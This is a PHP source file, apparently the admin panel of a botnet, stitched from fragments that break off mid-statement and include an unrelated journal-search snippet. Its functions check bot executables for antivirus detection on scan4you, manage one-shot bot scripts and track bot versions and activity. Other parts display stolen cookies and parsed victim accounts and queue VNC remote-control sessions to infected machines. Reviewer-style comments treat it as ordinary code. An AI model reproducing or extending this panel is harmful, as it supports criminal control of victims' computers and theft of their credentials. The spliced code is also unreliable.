/**
 * Scan exe files under files/ using scan4you.
 *
 * Selects every row of `exe_updates` whose `scan_date` is older than 20 hours,
 * submits the file to the Scan4you service, stores the per-file result back into
 * the same row and queues a Jabber message for files flagged by 6 or more engines.
 *
 * @param int|null $id File id for force scan: its `scan_date` is reset to 0 first so
 *                     the row is picked up by the selection below
 * @param bool $html Return HTML along with raw data
 *                   NOTE(review): documented but not present in the signature — the
 *                   function only accepts $id; confirm whether callers pass a second
 *                   argument (it would be silently ignored)
 * @return array map of file name => array('threat' => int, 'okay' => int[, 'error' => mixed])
 * @cron if: return !empty($GLOBALS['config']['scan4you_id']) && !empty($GLOBALS['config']['scan4you_token']);
 * @cron period: 1d
 * @cron weight: 10
 */
function cronjob_avirscan_files($id = null) {
    $jabber_notify = array();
    // Credentials come straight from the global config; the cron guard above is what
    // prevents running with empty values.
    $scan4you = new Scan4you($GLOBALS['config']['scan4you_id'], $GLOBALS['config']['scan4you_token']);
    if (!is_null($id)) {
        // Forced rescan: zeroing scan_date guarantees the row matches the `scan_date < date` filter below.
        mysql_q(mkquery('UPDATE `exe_updates` SET `scan_date`=0 WHERE `id`={i:id};', array('id' => $id)));
    }
    $job_result = array();
    // Anything not scanned within the last 20 hours (60 * 60 * 20 seconds).
    $res = mysql_q(mkquery('SELECT `id`, `file`, `mtime` FROM `exe_updates` WHERE `scan_date` < {i:date};', array('date' => time() - 60 * 60 * 20)));
    // `$res &&` guards a failed query; is_bool() stops on the `false` that mysql_fetch_assoc()
    // returns after the last row. NOTE: the mysql_* extension was removed in PHP 7.0.
    while ($res && !is_bool($exe = mysql_fetch_assoc($res))) {
        // `file` is joined to the directory without any normalisation — assumes the column
        // holds a bare file name; verify at the code that writes `exe_updates`.
        $exe_path = 'files/' . $exe['file'];
        # scan
        $results = $scan4you->scan($exe_path);
        // scan_threat / scan_okay are only ever count()ed here — presumably arrays; confirm in Scan4you.
        $job_result[$exe['file']] = array('threat' => count($results->scan_threat), 'okay' => count($results->scan_okay));
        if (!is_null($results->error)) {
            // The row is still written below even when the service reported an error.
            $job_result[$exe['file']]['error'] = $results->error;
        }
        # store
        // scan_details receives pre-rendered HTML; whatever displays it later must treat it as trusted markup.
        mysql_q(mkquery("UPDATE `exe_updates` SET `scan_date`=UNIX_TIMESTAMP(), `scan_threat` = {i:threat}, `scan_count`={i:count}, `scan_details`={s:details} WHERE `id`={i:id}", array('threat' => count($results->scan_threat), 'count' => count($results->scan_threat) + count($results->scan_okay), 'details' => $results->render_html('class="avirscan-results-map"'), 'id' => $exe['id'])));
        # notify
        // Hard-coded threshold: 6 detecting engines.
        if (count($results->scan_threat) >= 6) {
            $jabber_notify[] = sprintf("%s: %d Antiviruses detect it!\n\n%s\n", $exe['file'], count($results->scan_threat), $results->render_text());
        }
    }
    # Jabber notify
    // Called unconditionally, possibly with an empty list — presumably jabber_notify() handles that; verify.
    jabber_notify($GLOBALS['config']['scan4you_jid'], $jabber_notify);
    # Results
    return $job_result;
}
/**
 * Remove old scripts which are one-shot.
 *
 * Multi-table DELETE: rows of `botnet_scripts` and their matching `botnet_scripts_stat`
 * rows (joined on `extern_id`) are removed together when the script is disabled
 * (`flag_enabled`=0), limited to a single send (`send_limit`=1) and older than 7 days.
 *
 * @return array array('removed' => int) — mysql_affected_rows() after the DELETE;
 *               for a multi-table DELETE this presumably counts rows from both tables — confirm
 * @cron period: 1d
 */
function cronjob_cleanse_old() {
    // time_thr = now - 7 days (60 * 60 * 24 * 7 seconds).
    mysql_q(mkquery('DELETE `botnet_scripts`, `botnet_scripts_stat` FROM `botnet_scripts` CROSS JOIN `botnet_scripts_stat` USING(`extern_id`) WHERE `botnet_scripts`.`flag_enabled`=0 AND `botnet_scripts`.`send_limit`=1 AND `botnet_scripts`.`time_created`<{i:time_thr} ', array('time_thr' => time() - 60 * 60 * 24 * 7)));
    // The query result is not checked; on failure mysql_affected_rows() reports the previous statement.
    return array('removed' => mysql_affected_rows());
}
} } header('Location: ' . QUERY_STRING_BLANK . 'reports_files&bots=' . urlencode(implode(' ', $blist)) . '&q='); die; } else { if (strcmp($ba, 'cookies') === 0) { require_once 'system/lib/db.php'; require_once 'system/lib/guiutil.php'; echo '<link rel="stylesheet" href="theme/style.css" />'; $found_n = 0; foreach (array_reverse(list_reports_tables(true)) as $yymmdd) { $R = mysql_q(mkquery('SELECT `id`, `rtime`, `path_source`, `context` FROM `botnet_reports_{=:yymmdd}` WHERE `bot_id` IN({s,:botId}) AND `type`={i:type} ORDER BY `rtime` DESC ', array('yymmdd' => $yymmdd, 'botId' => $blist, 'type' => BLT_COOKIES))); $n = mysql_num_rows($R); if (!$n) { continue; } $found_n += $n; echo '<table class="lined"><caption>', '20', implode('.', str_split($yymmdd, 2)), '</caption>'; echo '<TBODY>'; while (!is_bool($r = mysql_fetch_assoc($R))) { echo '<tr>', '<th>', timeago(time() - $r['path_source']), '</th>', '<td>', htmlspecialchars($r['path_source']), '</td>', '<td><pre>', htmlspecialchars($r['context']), '</td>', '</tr>'; } echo '</BODY></table>';
/**
 * Build the HTML rows of the botnet statistics table.
 *
 * Produces: first-report time, total bot count, bots active in the last 24 hours
 * (with a hidden activity panel), the min/max bot version (with a hidden per-period
 * version breakdown) and the scripts that drive those panels.
 *
 * @param string $botnet Botnet name used as a filter; '' means all botnets.
 *                       NOTE(review): the value is interpolated into two SQL strings after
 *                       addslashes() only, which is not a safe SQL escape — it should go through
 *                       the same placeholder mechanism (mkquery) the later queries use.
 * @param int    $i      Row-striping parity: 0 selects the U1/U2 theme pairs in one order,
 *                       anything else the reverse.
 * @return string HTML fragment (table rows plus inline script/JSON setup)
 */
function getBotnetStats($botnet, $i) {
    $query1 = '';
    $query2 = '';
    // Loose comparison: "0" or similar falsy-looking names still pass, only '' is excluded.
    if ($botnet != '') {
        $botnet = addslashes($botnet);
        $query1 = " WHERE `botnet`='{$botnet}'";
        $query2 = " AND `botnet`='{$botnet}'";
    }
    // Number of bots, and time of the first report.
    // `@` suppresses errors from mysql_fetch_row(); if the query fails $mt is false and the
    // later $mt[1..3] reads silently yield null.
    $tmp = htmlEntitiesEx(($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', "SELECT MIN(`rtime_first`), COUNT(`bot_id`), MIN(`bot_version`), MAX(`bot_version`) FROM `botnet_list`{$query1}"))) && $mt[0] > 0 ? gmdate(LNG_FORMAT_DT, $mt[0]) : '-');
    // Two rows: first-bot time, then total bot count. Theme constants alternate on $i.
    $data = THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_FIRST_BOT), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $tmp), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, numberFormatAsInt($mt[1])), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END;
    $totalBots = $mt[1];
    $minVersion = $mt[2];
    $maxVersion = $mt[3];
    // Number of bots active in the last 24 hours.
    // Uses the CURRENT_TIME constant here but time() further down — the two clocks may differ.
    $tmp = ($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', 'SELECT COUNT(`bot_id`) FROM `botnet_list` WHERE `rtime_last`>=' . (CURRENT_TIME - 86400) . $query2))) ? $mt[0] : 0;
    // Percentage of active bots; the division is skipped when the total is 0.
    $totalBots = '<a href="#" id="tr-botnet_activity">' . ($totalBots > 0 ? numberFormatAsFloat($tmp * 100 / $totalBots, 2) : 0) . '% - ' . numberFormatAsInt($tmp) . '</a>';
    $data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS24), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $totalBots), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END;
    // Hidden activity panel; the 7/14/30-day tabs point at the botnet_activity ajax handler.
    $data .= '<tr><td id="botnet_activity" style="display: none;"> <h3>' . LNG_STATS_ACTIVITY . '</h3> <ul class="tabs"> <li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=7">' . LNG_STATS_ACTIVITY_7DAYS . '</a></li> <li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=14">' . LNG_STATS_ACTIVITY_14DAYS . '</a></li> <li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=30">' . LNG_STATS_ACTIVITY_30DAYS . '</a></li> </ul> <div class="display"> </div> </td></tr> ';
    // Maximum and minimum bot version.
    $botVersions = intToVersion($minVersion) . ' — ' . intToVersion($maxVersion);
    $botVersions = '<a href="#" id="botVersions">' . $botVersions . '</a>';
    $data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_VERSIONS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $botVersions), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END;
    // Loaded mid-function: mysql_q/mkquery/jsonset below come from these files.
    require_once "system/lib/db.php";
    require_once "system/lib/guiutil.php";
    $data .= jsonset(array('window.botVersions' => array()));
    // Version breakdown per period: 0 = all time, 1 = last day, 2 = last week, 3 = last 31 days.
    // NOTE: this part ignores $botnet — the per-period counts are not filtered by the argument.
    foreach (array(0 => 0, 1 => time() - 60 * 60 * 24, 2 => time() - 60 * 60 * 24 * 7, 3 => time() - 60 * 60 * 24 * 31) as $id => $rtime_last) {
        $R = mysql_q(mkquery('SELECT `bot_version` AS `v`, COUNT(*) AS `n` FROM `botnet_list` WHERE `rtime_last` >= {i:rtime_last} GROUP BY `v` ORDER BY `n` DESC, `v` DESC ', array('rtime_last' => $rtime_last)));
        $versions = array();
        while ($R && !is_bool($r = mysql_fetch_assoc($R))) {
            $versions[] = array(intToVersion($r['v']), (int) $r['n']);
        }
        $data .= jsonset(array('window.botVersions[' . $id . ']' => $versions));
    }
    // Period selector; data-id matches the index used in window.botVersions[...] above.
    $ul = '';
    $ul .= '<li><a href="#" data-id="0">' . LNG_STATS_TOTAL_VERSIONS_ALL . '</a>';
    $ul .= '<li><a href="#" data-id="1">' . LNG_STATS_TOTAL_VERSIONS_DAY . '</a>';
    $ul .= '<li><a href="#" data-id="2">' . LNG_STATS_TOTAL_VERSIONS_WEEK . '</a>';
    $ul .= '<li><a href="#" data-id="3">' . LNG_STATS_TOTAL_VERSIONS_MONTH . '</a>';
    // Hidden version panel. Note the page pulls a script from an external origin
    // (www.google.com/jsapi) whenever these stats are rendered.
    $data .= <<<HTML
<tr><td id="botVersions-td" style="display:none;">
\t\t<div id="botVersions-Display" class="clearfix">
\t\t\t<div class="pie"></div>
\t\t\t<div class="table"></div>
\t\t\t</div>
\t\t<ul class="period">
\t\t\t{$ul}
\t\t\t</ul>
\t</td></tr>
<script type="text/javascript" src="https://www.google.com/jsapi"></script>
<script src="theme/js/page-stats_main.js"></script>
HTML;
    return $data;
}
/**
 * Remove old, archived Jabber notifications.
 *
 * Deletes rows of `jabber_messages` that have already been sent (`sent`=1)
 * and whose `sent_time` is more than 10 days in the past.
 *
 * @return array array('cleansed' => int) — mysql_affected_rows() after the DELETE
 * @cron period: 1d
 */
function cronjob_jabber_cleanse() {
    // old = now - 10 days (60 * 60 * 24 * 10 seconds).
    mysql_q(mkquery('DELETE FROM `jabber_messages` WHERE `sent`=1 AND `sent_time` < {i:old};', array('old' => time() - 60 * 60 * 24 * 10)));
    // The query result is not checked; on failure mysql_affected_rows() reports the previous statement.
    return array('cleansed' => mysql_affected_rows());
}
/**
 * Find botId by IP.
 *
 * Looks up `botnet_list`.`bot_id` by the packed 4-byte big-endian form of $ip
 * (the `ipv4` column is compared against the binary value, not the dotted string).
 *
 * @param string $ip Dotted-quad IPv4 address
 * @return string|null the first matching bot_id, or null when the query fails or matches nothing
 */
function bot_ip2id($ip) {
    // ip2long() returns false for an address it cannot parse; pack('N', false) then yields
    // four NUL bytes instead of an error, so an invalid $ip is looked up as 0.0.0.0 —
    // callers should validate the address first.
    $d = array('ip_bin' => pack('N', ip2long($ip)));
    // Uses mysql_query() directly, unlike the cron helpers in this file which go through mysql_q().
    $R = mysql_query(mkquery('SELECT `bot_id` FROM `botnet_list` WHERE `ipv4`={s:ip_bin};', $d));
    if (!$R || mysql_num_rows($R) == 0) {
        return null;
    }
    // Only the first row is used even if several bots share the address.
    // array_shift() takes its argument by reference, so passing a call result directly
    // raises "Only variables should be passed by reference".
    return array_shift(mysql_fetch_row($R));
}
break; case 'add_connect': # ?m=botnet_vnc&ajax=add_connect&bot=ID&protocol=VNC&autoconnect=0 $d = array('bot' => $_GET['bot'], 'protocol' => array_search($_GET['protocol'], $PROTOCOLS), 'do_connect' => $_GET['autoconnect'] ? -1 : 1); if (mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:bot}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $d))) { echo 'OK'; } else { echo 'MySQL error: ' . mysql_error(); } break; } die; } if (count($_POST)) { if (isset($_POST['connect'])) { mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:botid}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $_POST['connect'])); header('HTTP/1.1 301 Redirect'); header('Location: ?m=botnet_vnc'); die; } } ThemeBegin(LNG_THEME_TITLE, 0, getBotJsMenu('botmenu'), 0); echo '<table class="table_frame" id="switch-tabs"><tr><td>', '<ul>', '<li class="current"><a href="?m=botnet_vnc"><img src="images/vnc.png" />', LNG_MM_BOTNET_VNC, '</a></li>', '<li class="other" ><a href="?m=reports_accparse"><img src="images/drill.png" />', LNG_MM_REPORTS_ACCPARSE, '</a></li>', '</ul>', '</td></tr></table>'; # ==========[ ADD BOT ]========== # echo str_replace(array('{WIDTH}', '{COLUMNS_COUNT}', '{TEXT}'), array('100%', 1, LNG_CREATE_CONNECTION), THEME_LIST_BEGIN . THEME_LIST_TITLE), '<tr><td>'; if (empty($GLOBALS['config']['vnc_server'])) { echo '<div class="error">', LNG_NOT_CONFIGURED, '</div>'; } else { echo '<form method=POST>'; echo '<dl>'; echo '<dt>', LNG_CREATE_CONNECTION_BOTID, '</dt>', '<dd>', '<input type="text" name="connect[botid]" value="" size="100"/>', '</dd>';
><span>References</span></label></div> <div><select name="sec" id="ignore"> <option selected>All sections</option> <?php foreach ($subj as $k => $v) { $sel = $sec && $sec === $k ? ' selected' : ''; echo '<option value="' . $k . '"' . $sel . '>' . $v . '</option>'; } ?> </select></div> <div><button class="btn btn-green">Search</button></div> </form> </div> <?php } $res = $mysqli->query(mkquery($query)); while ($row = $res->fetch_assoc()) { $arc[$row['vol']][$row['issue']][] = $row; $totrow++; } /*echo '<pre>'; print_r($arc); echo '</pre>';*/ if (isset($arc)) { $cursec = ''; if ($xtra) { echo plural($totrow, 'result'); } foreach ($arc as $vol => $issue) { $year = J_YEAR + $vol; $cur = current($issue);
} echo '</TBODY>'; echo '</table>'; break; # List accounts of a rule|bot # List accounts of a rule|bot case 'accs': # The Input $where = '1=1'; if (!empty($_GET['rule'])) { $where .= ' AND `a`.`rule_id`={i:rule}'; } if (!empty($_GET['bot'])) { $where .= ' AND `a`.`bot_id`={s:bot}'; } $where = mkquery($where, $_GET); $_GET['online'] = isset($_GET['online']) ? (int) $_GET['online'] : 0; # The Query $R = mysql_query($q = <<<SQL t\tSELECT t\t\t`r`.`id` AS `rule_id`, t\t\t`r`.`alias` AS `rule_alias`, t\t\t`r`.`enabled` AS `rule_enabled`, t\t\t`a`.`bot_id` AS `bot_id`, t\t\t`a`.`bot_info` AS `bot_info`, t\t\t`a`.`id` AS `acc_id`, t\t\t`a`.`account` AS `account`, t\t\t`a`.`mtime` AS `acc_mtime`, t\t\t`a`.`favorite` AS `acc_favorite`, t\t\t`a`.`notes` AS `acc_notes`, t\t\t`b`.`os_version` AS `bot_os`,